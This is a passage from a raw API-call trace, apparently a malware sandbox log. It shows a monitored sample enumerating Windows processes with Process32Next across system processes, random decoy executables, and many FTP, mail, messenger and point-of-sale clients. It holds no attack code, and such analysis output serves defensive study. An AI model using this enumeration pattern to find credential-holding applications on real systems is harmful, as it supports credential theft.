th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.246] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.248] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.249] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.251] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.252] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.254] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.255] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.257] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.258] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.272] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.274] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.276] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.277] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.279] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.280] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.282] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.283] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0258.285] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.326] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0258.328] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.329] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0258.330] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0258.332] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0258.333] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0258.335] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0258.336] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0258.338] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.339] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.341] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0258.342] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.344] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.345] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.347] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0258.348] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0258.350] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0258.351] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0258.353] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0258.354] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0258.356] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0258.357] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0258.359] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0258.398] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0258.400] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0258.401] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0258.402] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0258.404] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0258.405] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0258.407] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0258.408] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0258.410] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0258.411] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0258.413] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0258.414] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0258.416] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0258.418] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0258.420] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0258.422] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0258.424] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0258.425] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0258.427] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0258.430] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0258.509] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0258.511] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0258.513] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0258.515] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0258.517] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0258.519] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0258.523] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0258.525] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0258.527] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0258.529] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0258.531] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0258.533] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0258.535] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0258.537] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0258.539] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0258.541] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0258.545] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0258.547] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0258.585] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0258.587] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0258.588] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0258.590] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 